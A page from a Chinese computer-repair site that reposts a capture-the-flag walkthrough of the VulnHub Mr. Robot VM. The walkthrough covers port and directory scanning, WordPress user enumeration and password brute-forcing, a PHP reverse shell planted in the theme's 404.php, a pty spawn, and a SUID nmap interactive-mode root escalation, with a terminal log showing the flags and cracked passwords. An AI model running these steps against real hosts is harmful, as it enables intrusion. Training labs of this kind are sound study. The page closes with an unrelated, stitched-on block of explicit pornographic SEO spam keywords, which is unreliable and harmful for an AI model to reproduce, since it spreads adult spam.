錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
拿到主機root權限,Mr.Robot靶機實戰演練

作者: 佚名  日期:2018-06-29 19:59:07   來源: 本站整理

 前言

靶機主題來自美劇《黑客軍團》,這是一部傳達極客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑風格,這部劇的主角Eliot患有精神分裂,整部劇的情節都較為壓抑,有點類似于電影《搏擊俱樂部》中雙重人格的斗爭。
雖然有影視色彩的加成,但是劇中的黑客技術細節還是足夠真實的,起碼符合常規的入侵滲透思路,強烈推薦該劇。
本次靶機有三個flag,難度在初級到中級,非常適合新手訓練學習,不需要逆向技術,目標就是找到三個key,并且拿到主機root權限。

 
環境配置
靶機下載地址:https://www.vulnhub.com/entry/mr-robot-1,151/
我使用的是VMware,導入ova文件,NAT方式連接后靶機自動獲取IP
本次實戰:
靶機IP:192.168.128.142
攻擊機IP:192.168.128.106
 
實戰演練
nmap開路,IP發現:

端口發現,服務版本探測:
nmap -sV -O 192.168.128.142

開啟了三個端口,發現web端口:80,443


查看源碼沒有發現可用信息,用dirb跑目錄:


發現有robots.txt文件,訪問http://192.168.128.142/robots.txt

發現兩個文件,訪問發現第一個目錄里是一個密碼字典,第二個像是一個密碼哈希,這是第一個key
073403c8a58a1f80d943455fb30724b9



密碼哈希無法爆破,字典也先放著后面用,現在用nikto掃描,看看有沒有可用漏洞:

發現有wordpress服務,之前dirb掃目錄也發現了wordpress登錄頁面
http://192.168.128.142/wp-login

發現wordpress服務,用wpscan掃描網站,只有登錄頁面,并沒有發現什么可用漏洞

在登錄頁面隨便輸入之前字典中的用戶,發現可以枚舉用戶名:

用burp枚舉出了兩個用戶名:

用elloit作為用戶名,再掛上這個字典跑密碼:

跑了好久,終于跑出密碼:ER28-0652,字典實在太大了,對字典做了篩選為了截圖方便就把重新跑了一遍

接下來就是獲取權限了,登陸之后,依次點擊apperance>editor>404.php

在kali找到php-reverse-shell.php,將其覆蓋到404.php更改監聽端口,IP


攻擊機上監聽此端口,訪問http://192.168.128.142/234543658,任意不存在頁面觸發shell

執行 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 獲得一個更加穩定的shell

接下來查看靶機密碼文件:

發現沒法利用,先放一放。再看看其他目錄,找到一個密碼的md5散列.

拿出來破解:https://hashkiller.co.uk/md5-decrypter.aspx
abcdefghijklmnopqrstuvwxyz

用得到的密碼登錄robot

拿到第二個key,并且又拿到一個加密哈希,估計這個是root用戶的密碼
提升權限,但是沒有成功,只能想別的辦法
最后找到一個辦法,用nmap執行root權限

nmap產生了一個root權限的新shell


代碼如下:
daemon@linux:/$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:/$ pwd
pwd
/
robot@linux:/$ cd /home
cd /home
robot@linux:/home$ ls
ls
robot
robot@linux:/home$ cd robot
cd robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
robot@linux:~$ find / -user root -perm -4000 2>/dev/null
find / -user root -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:~$ /usr/local/bin/nmap —version
/usr/local/bin/nmap —version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:~$ nmap —interactive
nmap —interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode — press h  for help
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
nmap> !bash -p
!bash -p
bash-4.3# whoami
whoami
root
bash-4.3# cd /root
cd /root
bash-4.3# ls -al
ls -al
total 32
drwx——— 3 root root 4096 Nov 13 2015 .
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
-rw———- 1 root root 4058 Nov 14 2015 .bash_history
-rw-r—r— 1 root root 3274 Sep 16 2015 .bashrc
drwx——— 2 root root 4096 Nov 13 2015 .cache
-rw-r—r— 1 root root 0 Nov 13 2015 firstboot_done
-r———— 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r—r— 1 root root 140 Feb 20 2014 .profile
-rw———- 1 root root 1024 Sep 16 2015 .rnd
bash-4.3# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
bash-4.3# ls
ls
firstboot_done key-3-of-3.txt
成功拿到第三個key:
04787ddef27c3dee1ee161b21670b4e4
拿到靶機root權限,game over。
 
總結
這個靶機的難度并不大,遇到的難點:
1.使用 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 可以獲得一個穩定的shell,這個在實際滲透中用處也很大
2.用了很多辦法,一直拿不到root權限,查了很多資料發現了nmap自帶的提權腳本,這個技能get
3.這個靶機只開了web端口,ssh應該也是可以觸發的,大牛們可以嘗試
4.思路就是通過web頁面漏洞拿下了整個主機,wp提權思路也很多,大家也可以換思路滲透
 


熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 久久午夜无码鲁丝片直播午夜精品| 国产免费久久久久久无码| 亚洲私人无码综合久久网| 亚洲av无码专区在线观看亚| 无码人妻一区二区三区在线水卜樱 | 国产亚洲?V无码?V男人的天堂 | 少妇人妻av无码专区| 无码一区二区三区免费| 激情射精爆插热吻无码视频| 无码无套少妇毛多18PXXXX| 免费无码午夜福利片| 99热门精品一区二区三区无码| 国产精品亚洲专区无码不卡| 精品爆乳一区二区三区无码av| 国产品无码一区二区三区在线蜜桃 | 无码专区久久综合久中文字幕| 国产精品爽爽V在线观看无码| 亚洲美免无码中文字幕在线| 久久久久亚洲AV无码专区桃色 | 亚洲成A∨人片天堂网无码| 亚洲另类无码专区丝袜| 亚洲AV日韩AV永久无码绿巨人| 天天看高清无码一区二区三区| 人妻丰满熟AV无码区HD| 亚洲熟妇无码一区二区三区导航| 亚洲av成人无码久久精品| 一本大道东京热无码一区| 久久无码人妻精品一区二区三区| 无码少妇一区二区三区芒果| 亚洲GV天堂无码男同在线观看| 老子午夜精品无码| 久久久无码一区二区三区| 亚洲AV无码国产精品色午友在线 | MM1313亚洲精品无码久久| 无码中文字幕av免费放| 久久精品无码一区二区三区不卡 | 亚洲精品无码久久久久A片苍井空| 久久青青草原亚洲AV无码麻豆| 国产热の有码热の无码视频| 亚洲av日韩av高潮潮喷无码 | 97无码免费人妻超级碰碰夜夜|